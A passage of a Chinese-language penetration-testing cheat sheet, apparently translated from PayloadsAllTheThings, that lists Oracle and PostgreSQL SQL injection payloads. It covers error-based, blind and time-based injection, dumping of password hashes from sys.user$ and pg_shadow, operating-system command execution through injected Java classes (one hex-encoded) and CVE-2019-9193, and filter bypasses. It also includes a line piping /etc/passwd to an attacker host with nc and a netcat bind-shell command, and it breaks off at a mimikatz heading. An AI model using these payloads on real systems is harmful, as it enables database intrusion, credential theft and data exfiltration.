默认数据库</h3><table><thead><tr><th>Name</th><th>Description</th></tr></thead><tbody><tr><td>SYSTEM</td><td>适用于所有版本</td></tr><tr><td>SYSAUX</td><td>适用于所有版本</td></tr></tbody></table><h3 id="Oracle-SQL-注释"><a href="#Oracle-SQL-注释" class="headerlink" title="Oracle SQL 注释"></a>Oracle SQL 注释</h3><table><thead><tr><th>Type</th><th>Description</th></tr></thead><tbody><tr><td>​<code>-- -</code>​</td><td>SQL comment</td></tr></tbody></table><h3 id="Oracle-SQL-版本"><a href="#Oracle-SQL-版本" class="headerlink" title="Oracle SQL 版本"></a>Oracle SQL 版本</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">SELECT user FROM dual UNION SELECT * FROM v$version</span><br><span class="line">SELECT banner FROM v$version WHERE banner LIKE &#x27;Oracle%&#x27;;</span><br><span class="line">SELECT banner FROM v$version WHERE banner LIKE &#x27;TNS%&#x27;;</span><br><span class="line">SELECT version FROM v$instance;</span><br></pre></td></tr></table></figure><h3 id="Oracle-SQL-主机名"><a href="#Oracle-SQL-主机名" class="headerlink" title="Oracle SQL 主机名"></a>Oracle SQL 主机名</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">SELECT host_name FROM v$instance; (Privileged)</span><br><span class="line">SELECT UTL_INADDR.get_host_name FROM dual;</span><br><span class="line">SELECT UTL_INADDR.get_host_name(&#x27;10.0.0.1&#x27;) FROM dual;</span><br><span class="line">SELECT UTL_INADDR.get_host_address FROM dual;</span><br></pre></td></tr></table></figure><h3 id="Oracle-SQL-数据库名称"><a href="#Oracle-SQL-数据库名称" class="headerlink" title="Oracle SQL 数据库名称"></a>Oracle SQL 数据库名称</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">SELECT global_name FROM global_name;</span><br><span class="line">SELECT name FROM V$DATABASE;</span><br><span class="line">SELECT instance_name FROM V$INSTANCE;</span><br><span class="line">SELECT SYS.DATABASE_NAME FROM DUAL;</span><br></pre></td></tr></table></figure><h3 id="Oracle-SQL-数据库凭证"><a href="#Oracle-SQL-数据库凭证" class="headerlink" title="Oracle SQL 数据库凭证"></a>Oracle SQL 数据库凭证</h3><table><thead><tr><th>SQL 语句</th><th>描述</th></tr></thead><tbody><tr><td>​<code>SELECT username FROM all_users;</code>​</td><td>适用于所有版本</td></tr><tr><td>​<code>SELECT name, password from sys.user$;</code>​</td><td>Privileged, &lt;= 10g</td></tr><tr><td>​<code>SELECT name, spare4 from sys.user$;</code>​</td><td>Privileged, &lt;= 11g</td></tr></tbody></table><h3 id="Oracle-SQL-列出数据库"><a href="#Oracle-SQL-列出数据库" class="headerlink" title="Oracle SQL 列出数据库"></a>Oracle SQL 列出数据库</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT DISTINCT owner FROM all_tables;</span><br></pre></td></tr></table></figure><h3 id="Oracle-SQL-列出列"><a href="#Oracle-SQL-列出列" class="headerlink" title="Oracle SQL 列出列"></a>Oracle SQL 列出列</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">SELECT column_name FROM all_tab_columns WHERE table_name = &#x27;blah&#x27;;</span><br><span class="line">SELECT column_name FROM all_tab_columns WHERE table_name = &#x27;blah&#x27; and owner = &#x27;foo&#x27;;</span><br></pre></td></tr></table></figure><h3 id="Oracle-SQL-列出表"><a href="#Oracle-SQL-列出表" class="headerlink" title="Oracle SQL 列出表"></a>Oracle SQL 列出表</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SELECT table_name FROM all_tables;</span><br><span class="line">SELECT owner, table_name FROM all_tables;</span><br><span class="line">SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE &#x27;%PASS%&#x27;;</span><br></pre></td></tr></table></figure><h3 id="Oracle-SQL-报错注入"><a href="#Oracle-SQL-报错注入" class="headerlink" title="Oracle SQL 报错注入"></a>Oracle SQL 报错注入</h3><table><thead><tr><th>Description</th><th>Query</th></tr></thead><tbody><tr><td>Invalid HTTP Request</td><td>​<code>SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual</code>​</td></tr><tr><td>CTXSYS.DRITHSX.SN</td><td>​<code>SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual</code>​</td></tr><tr><td>Invalid XPath</td><td>​<code>SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual</code>​</td></tr><tr><td>Invalid XML</td><td>​<code>SELECT to_char(dbms_xmlgen.getxml(&#39;select &quot;&#39;||(select user from sys.dual)||&#39;&quot; FROM sys.dual&#39;)) FROM dual</code>​</td></tr><tr><td>Invalid XML</td><td>​<code>SELECT rtrim(extract(xmlagg(xmlelement(&quot;s&quot;, username || &#39;,&#39;)),&#39;/s&#39;).getstringval(),&#39;,&#39;) FROM all_users</code>​</td></tr><tr><td>SQL Error</td><td>​<code>SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1))</code>​</td></tr><tr><td>XDBURITYPE getblob</td><td>​<code>XDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE &#39;Oracle%&#39;)).getblob()</code>​</td></tr><tr><td>XDBURITYPE getclob</td><td>​<code>XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob()</code>​</td></tr></tbody></table><p>When the injection point is inside a string use : <code>&#39;||PAYLOAD--</code>​</p><h3 id="Oracle-SQL-盲注"><a href="#Oracle-SQL-盲注" class="headerlink" title="Oracle SQL 盲注"></a>Oracle SQL 盲注</h3><table><thead><tr><th>Description</th><th>Query</th></tr></thead><tbody><tr><td>Version is 12.2</td><td>​<code>SELECT COUNT(*) FROM v$version WHERE banner LIKE &#39;Oracle%12.2%&#39;;</code>​</td></tr><tr><td>Subselect is enabled</td><td>​<code>SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual)</code>​</td></tr><tr><td>Table log_table exists</td><td>​<code>SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table);</code>​</td></tr><tr><td>Column message exists in table log_table</td><td>​<code>SELECT COUNT(*) FROM user_tab_cols WHERE column_name = &#39;MESSAGE&#39; AND table_name = &#39;LOG_TABLE&#39;;</code>​</td></tr><tr><td>First letter of first message is t</td><td>​<code>SELECT message FROM log_table WHERE rownum=1 AND message LIKE &#39;t%&#39;;</code>​</td></tr></tbody></table><h3 id="Oracle-SQL-时间注入"><a href="#Oracle-SQL-时间注入" class="headerlink" title="Oracle SQL 时间注入"></a>Oracle SQL 时间注入</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE(&#x27;[RANDSTR]&#x27;,[SLEEPTIME]) </span><br></pre></td></tr></table></figure><h4 id="Oracle-SQL-命令执行"><a href="#Oracle-SQL-命令执行" class="headerlink" title="Oracle SQL 命令执行"></a>Oracle SQL 命令执行</h4><ul><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL3F1ZW50aW5oYXJkeS9vZGF0">ODAT (Oracle Database Attacking Tool)</a></li></ul><h4 id="Oracle-Java-Execution"><a href="#Oracle-Java-Execution" class="headerlink" title="Oracle Java Execution"></a>Oracle Java Execution</h4><ul><li><p>List Java privileges<br>​<code>sql select * from dba_java_policy select * from user_java_policy</code>​</p></li><li><p>Grant privileges<br>​<code>sql exec dbms_java.grant_permission(&#39;SCOTT&#39;, &#39;SYS:java.io.FilePermission&#39;,&#39;&lt;&lt;ALL FILES&gt;&gt;&#39;,&#39;execute&#39;); exec dbms_java.grant_permission(&#39;SCOTT&#39;,&#39;SYS:java.lang.RuntimePermission&#39;, &#39;writeFileDescriptor&#39;, &#39;&#39;); exec dbms_java.grant_permission(&#39;SCOTT&#39;,&#39;SYS:java.lang.RuntimePermission&#39;, &#39;readFileDescriptor&#39;, &#39;&#39;);</code>​</p></li><li><p>Execute commands</p><ul><li>10g R2, 11g R1 and R2: <code>DBMS_JAVA_TEST.FUNCALL()</code>​<br>​<code>sql SELECT DBMS_JAVA_TEST.FUNCALL(&#39;oracle/aurora/util/Wrapper&#39;,&#39;main&#39;,&#39;c:\\windows\\system32\\cmd.exe&#39;,&#39;/c&#39;, &#39;dir &gt;c:\test.txt&#39;) FROM DUAL SELECT DBMS_JAVA_TEST.FUNCALL(&#39;oracle/aurora/util/Wrapper&#39;,&#39;main&#39;,&#39;/bin/bash&#39;,&#39;-c&#39;,&#39;/bin/ls&gt;/tmp/OUT2.LST&#39;) from dual</code>​</li><li>11g R1 and R2: <code>DBMS_JAVA.RUNJAVA()</code>​<br>​<code>sql SELECT DBMS_JAVA.RUNJAVA(&#39;oracle/aurora/util/Wrapper /bin/bash -c /bin/ls&gt;/tmp/OUT.LST&#39;) FROM DUAL</code>​</li></ul></li></ul><h4 id="Oracle-Java-Class"><a href="#Oracle-Java-Class" class="headerlink" title="Oracle Java Class"></a>Oracle Java Class</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">/* create Java class */</span><br><span class="line">BEGIN</span><br><span class="line">EXECUTE IMMEDIATE &#x27;create or replace and compile java source named &quot;PwnUtil&quot; as import java.io.*; public class PwnUtil&#123; public static String runCmd(String args)&#123; try&#123; BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = &quot;&quot;;while ((stemp = myReader.readLine()) != null) str += stemp + &quot;\n&quot;;myReader.close();return str;&#125; catch (Exception e)&#123; return e.toString();&#125;&#125; public static String readFile(String filename)&#123; try&#123; BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = &quot;&quot;;while((stemp = myReader.readLine()) != null) str += stemp + &quot;\n&quot;;myReader.close();return str;&#125; catch (Exception e)&#123; return e.toString();&#125;&#125;&#125;;&#x27;;</span><br><span class="line">END;</span><br><span class="line">/</span><br><span class="line"></span><br><span class="line">BEGIN</span><br><span class="line">EXECUTE IMMEDIATE &#x27;create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name &#x27;&#x27;PwnUtil.runCmd(java.lang.String) return String&#x27;&#x27;;&#x27;;</span><br><span class="line">END;</span><br><span class="line">/</span><br><span class="line"></span><br><span class="line">/* run OS command */</span><br><span class="line">SELECT PwnUtilFunc(&#x27;ping -c 4 localhost&#x27;) FROM dual;</span><br></pre></td></tr></table></figure><p>or (hex encoded)</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">/* create Java class */</span><br><span class="line">SELECT TO_CHAR(dbms_xmlquery.getxml(&#x27;declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(&#x27;&#x27;637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d&#x27;&#x27;));</span><br><span class="line">EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(&#x27;&#x27;637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b&#x27;&#x27;)); end;&#x27;)) results FROM dual</span><br><span class="line"></span><br><span class="line">/* run OS command */</span><br><span class="line">SELECT PwnUtilFunc(&#x27;ping -c 4 localhost&#x27;) FROM dual;</span><br></pre></td></tr></table></figure><h3 id="References-1"><a href="#References-1" class="headerlink" title="References"></a>References</h3><blockquote><p>注：大部分内容翻译至：<a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL3N3aXNza3lyZXBvL1BheWxvYWRzQWxsVGhlVGhpbmdz">https://github.com/swisskyrepo/PayloadsAllTheThings</a></p></blockquote><ul><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9zcWx3aWtpLm5ldHNwaS5jb20vaW5qZWN0aW9uVHlwZXMvZXJyb3JCYXNlZC8jb3JhY2xl">NetSpi – SQL Wiki</a></li><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9vd2FzcC5vcmcvd3d3LXBkZi1hcmNoaXZlL0FTREMxMi1OZXdfYW5kX0ltcHJvdmVkX0hhY2tpbmdfT3JhY2xlX0Zyb21fV2ViLnBkZg==">ASDC12 – New and Improved Hacking Oracle From Web – OWASP</a></li><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9ib29rLmhhY2t0cmlja3MueHl6L25ldHdvcmstc2VydmljZXMtcGVudGVzdGluZy8xNTIxLTE1MjItMTUyOS1wZW50ZXN0aW5nLW9yYWNsZS1saXN0ZW5lcg==">Pentesting Oracle TNS Listener – HackTricks</a></li><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL3F1ZW50aW5oYXJkeS9vZGF0L3dpa2kvcHJpdmVzYw==">ODAT: Oracle Database Attacking Tool – quentinhardy</a></li><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly93d3cud2Vic2VjLmNhL2tiL3NxbF9pbmplY3Rpb24jT3JhY2xlX0RlZmF1bHRfRGF0YWJhc2Vz">WebSec CheatSheet – Oracle</a></li><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly93d3cubWFubnVsaW51eC5vcmcvMjAyMy8xMi9OZXctcGF5bG9hZC10by1leHBsb2l0LUVycm9yLWJhc2VkLVNRTC1pbmplY3Rpb24tT3JhY2xlLWRhdGFiYXNlLmh0bWw=">New payload to exploit Error-based SQL injection – Oracle database – Mannu Linux – 12&#x2F;09&#x2F;2023</a></li><li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md">https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md</a></li></ul><h2 id="postgresql"><a href="#postgresql" class="headerlink" title="postgresql"></a>postgresql</h2><h3 id="PostgreSQL-命令执行"><a href="#PostgreSQL-命令执行" class="headerlink" title="PostgreSQL 命令执行"></a>PostgreSQL 命令执行</h3><h4 id="CVE-2019–9193"><a href="#CVE-2019–9193" class="headerlink" title="CVE-2019–9193"></a>CVE-2019–9193</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">DROP TABLE IF EXISTS cmd_exec;</span><br><span class="line">CREATE TABLE cmd_exec(cmd_output text);</span><br><span class="line">COPY cmd_exec FROM PROGRAM &#x27;id&#x27;;</span><br><span class="line">SELECT * FROM cmd_exec;</span><br></pre></td></tr></table></figure><h3 id="使用-libc-so-6"><a href="#使用-libc-so-6" class="headerlink" title="使用 libc.so.6"></a>使用 libc.so.6</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS &#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;, &#x27;system&#x27; LANGUAGE &#x27;c&#x27; STRICT;</span><br><span class="line">SELECT system(&#x27;cat /etc/passwd | nc &lt;attacker IP&gt; &lt;attacker port&gt;&#x27;);</span><br></pre></td></tr></table></figure><h3 id="PostgreSQL-注释"><a href="#PostgreSQL-注释" class="headerlink" title="PostgreSQL 注释"></a>PostgreSQL 注释</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">--</span><br><span class="line">/**/</span><br></pre></td></tr></table></figure><h3 id="PostgreSQL-链注入点符号"><a href="#PostgreSQL-链注入点符号" class="headerlink" title="PostgreSQL 链注入点符号"></a>PostgreSQL 链注入点符号</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">; #用于终止 SQL 命令。在语句中唯一可使用的位置是在字符串常量或引用标识符中。</span><br><span class="line">|| #或语句</span><br><span class="line"></span><br><span class="line"># 使用示例: </span><br><span class="line">/?whatever=1;(select 1 from pg_sleep(5))</span><br><span class="line">/?whatever=1||(select 1 from pg_sleep(5))</span><br></pre></td></tr></table></figure><h3 id="PostgreSQL-版本"><a href="#PostgreSQL-版本" class="headerlink" title="PostgreSQL 版本"></a>PostgreSQL 版本</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT version()</span><br></pre></td></tr></table></figure><h3 id="PostgreSQL-当前用户"><a href="#PostgreSQL-当前用户" class="headerlink" title="PostgreSQL 当前用户"></a>PostgreSQL 当前用户</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">SELECT user;</span><br><span class="line">SELECT current_user;</span><br><span class="line">SELECT session_user;</span><br><span class="line">SELECT usename FROM pg_user;</span><br><span class="line">SELECT getpgusername();</span><br></pre></td></tr></table></figure><h3 id="PostgreSQL-用户列表"><a href="#PostgreSQL-用户列表" class="headerlink" title="PostgreSQL 用户列表"></a>PostgreSQL 用户列表</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT usename FROM pg_user</span><br></pre></td></tr></table></figure><h3 id="PostgreSQL-密码哈希列表"><a href="#PostgreSQL-密码哈希列表" class="headerlink" title="PostgreSQL 密码哈希列表"></a>PostgreSQL 密码哈希列表</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT usename, passwd FROM pg_shadow </span><br></pre></td></tr></table></figure><h3 id="查询数据库管理员账户列表"><a href="#查询数据库管理员账户列表" class="headerlink" title="查询数据库管理员账户列表"></a>查询数据库管理员账户列表</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT usename FROM pg_user WHERE usesuper IS TRUE</span><br></pre></td></tr></table></figure><h3 id="PostgreSQL-权限列表"><a href="#PostgreSQL-权限列表" class="headerlink" title="PostgreSQL 权限列表"></a>PostgreSQL 权限列表</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user</span><br></pre></td></tr></table></figure><h3 id="查询当前用户是否为超级用户"><a href="#查询当前用户是否为超级用户" class="headerlink" title="查询当前用户是否为超级用户"></a>查询当前用户是否为超级用户</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SHOW is_superuser; </span><br><span class="line">SELECT current_setting(&#x27;is_superuser&#x27;);</span><br><span class="line">SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;</span><br></pre></td></tr></table></figure><h3 id="PostgreSQL-数据库名称"><a href="#PostgreSQL-数据库名称" class="headerlink" title="PostgreSQL 数据库名称"></a>PostgreSQL 数据库名称</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT current_database()</span><br></pre></td></tr></table></figure><h3 id="PostgreSQL-数据库列表"><a href="#PostgreSQL-数据库列表" class="headerlink" title="PostgreSQL 数据库列表"></a>PostgreSQL 数据库列表</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT datname FROM pg_database</span><br></pre></td></tr></table></figure><h3 id="PostgreSQL-表格列表"><a href="#PostgreSQL-表格列表" class="headerlink" title="PostgreSQL 表格列表"></a>PostgreSQL 表格列表</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT table_name FROM information_schema.tables</span><br></pre></td></tr></table></figure><h3 id="PostgreSQL-列表列"><a href="#PostgreSQL-列表列" class="headerlink" title="PostgreSQL 列表列"></a>PostgreSQL 列表列</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT column_name FROM information_schema.columns WHERE table_name=&#x27;data_table&#x27;</span><br></pre></td></tr></table></figure><h3 id="PostgreSQL-报错注入"><a href="#PostgreSQL-报错注入" class="headerlink" title="PostgreSQL 报错注入"></a>PostgreSQL 报错注入</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)</span><br><span class="line">,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--</span><br><span class="line">,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=&#x27;data_table&#x27;+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--</span><br><span class="line">,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)</span><br><span class="line"></span><br><span class="line">&#x27; and 1=cast((SELECT concat(&#x27;DATABASE: &#x27;,current_database())) as int) and &#x27;1&#x27;=&#x27;1</span><br><span class="line">&#x27; and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and &#x27;1&#x27;=&#x27;1</span><br><span class="line">&#x27; and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name=&#x27;data_table&#x27; LIMIT 1 OFFSET data_offset) as int) and &#x27;1&#x27;=&#x27;1</span><br><span class="line">&#x27; and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and &#x27;1&#x27;=&#x27;1</span><br></pre></td></tr></table></figure><h3 id="PostgreSQL-XML-帮助器"><a href="#PostgreSQL-XML-帮助器" class="headerlink" title="PostgreSQL XML 帮助器"></a>PostgreSQL XML 帮助器</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select query_to_xml(&#x27;select * from pg_user&#x27;,true,true,&#x27;&#x27;); -- 返回所有结果作为单个 xml 行</span><br><span class="line">select database_to_xml(true,true,&#x27;&#x27;); -- 将当前数据库转储为 XML</span><br><span class="line">select database_to_xmlschema(true,true,&#x27;&#x27;); -- 将当前数据库转储为 XML 架构</span><br></pre></td></tr></table></figure><h3 id="PostgreSQL-盲注"><a href="#PostgreSQL-盲注" class="headerlink" title="PostgreSQL 盲注"></a>PostgreSQL 盲注</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#x27; and substr(version(),1,10) = &#x27;PostgreSQL&#x27; and &#x27;1&#x27; -&gt; OK</span><br><span class="line">&#x27; and substr(version(),1,10) = &#x27;PostgreXXX&#x27; and &#x27;1&#x27; -&gt; KO</span><br></pre></td></tr></table></figure><h3 id="PostgreSQL-时间盲注"><a href="#PostgreSQL-时间盲注" class="headerlink" title="PostgreSQL 时间盲注"></a>PostgreSQL 时间盲注</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">select 1 from pg_sleep(5)</span><br><span class="line">;(select 1 from pg_sleep(5))</span><br><span class="line">||(select 1 from pg_sleep(5))</span><br><span class="line"></span><br><span class="line">select case when substring(datname,1,1)=&#x27;1&#x27; then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1</span><br><span class="line">select case when substring(table_name,1,1)=&#x27;a&#x27; then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1</span><br><span class="line">select case when substring(column,1,1)=&#x27;1&#x27; then pg_sleep(5) else pg_sleep(0) end from table_name limit 1</span><br><span class="line">select case when substring(column,1,1)=&#x27;1&#x27; then pg_sleep(5) else pg_sleep(0) end from table_name where column_name=&#x27;value&#x27; limit 1</span><br><span class="line"></span><br><span class="line">AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</span><br><span class="line">AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</span><br></pre></td></tr></table></figure><h3 id="PostgreSQL-堆叠查询"><a href="#PostgreSQL-堆叠查询" class="headerlink" title="PostgreSQL 堆叠查询"></a>PostgreSQL 堆叠查询</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://host/vuln.php?id=injection&#x27;;create table NotSoSecure (data varchar(200));--</span><br></pre></td></tr></table></figure><h3 id="PostgreSQL-文件读取"><a href="#PostgreSQL-文件读取" class="headerlink" title="PostgreSQL 文件读取"></a>PostgreSQL 文件读取</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select pg_ls_dir(&#x27;./&#x27;);</span><br><span class="line">select pg_read_file(&#x27;PG_VERSION&#x27;, 0, 200);</span><br></pre></td></tr></table></figure><h3 id="PostgreSQL-文件写入"><a href="#PostgreSQL-文件写入" class="headerlink" title="PostgreSQL 文件写入"></a>PostgreSQL 文件写入</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">CREATE TABLE pentestlab (t TEXT);</span><br><span class="line">INSERT INTO pentestlab(t) VALUES(&#x27;nc -lvvp 2346 -e /bin/bash&#x27;);</span><br><span class="line">SELECT * FROM pentestlab;</span><br><span class="line">COPY pentestlab(t) TO &#x27;/tmp/pentestlab&#x27;;</span><br></pre></td></tr></table></figure><h3 id="绕过过滤器"><a href="#绕过过滤器" class="headerlink" title="绕过过滤器"></a>绕过过滤器</h3><p>引号</p><p>使用 CHR</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT CHR(65)||CHR(66)||CHR(67);</span><br></pre></td></tr></table></figure><p>使用 $ 符号（适用于 PostgreSQL 8及以上版本）</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">SELECT $$This is a string$$</span><br><span class="line">SELECT $TAG$This is another string$TAG$</span><br></pre></td></tr></table></figure><blockquote><p>注：大部分内容翻译至：<a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL3N3aXNza3lyZXBvL1BheWxvYWRzQWxsVGhlVGhpbmdz">https://github.com/swisskyrepo/PayloadsAllTheThings</a></p></blockquote><h2 id="工具使用命令速查"><a href="#工具使用命令速查" class="headerlink" title="工具使用命令速查"></a>工具使用命令速查</h2><h2 id="mimikatz"><a href="#mimikatz" class="headerlink" title="mimikatz"></a>mimikatz</h2><p>官方 Github：<a href="https://github.com/gentilkiwi/mimikatz">https://github.com/gentilkiwi/mimikatz</a></p><h3 id="获取登录凭证信息"><a href="#获取登录凭证信息" class="headerlink" 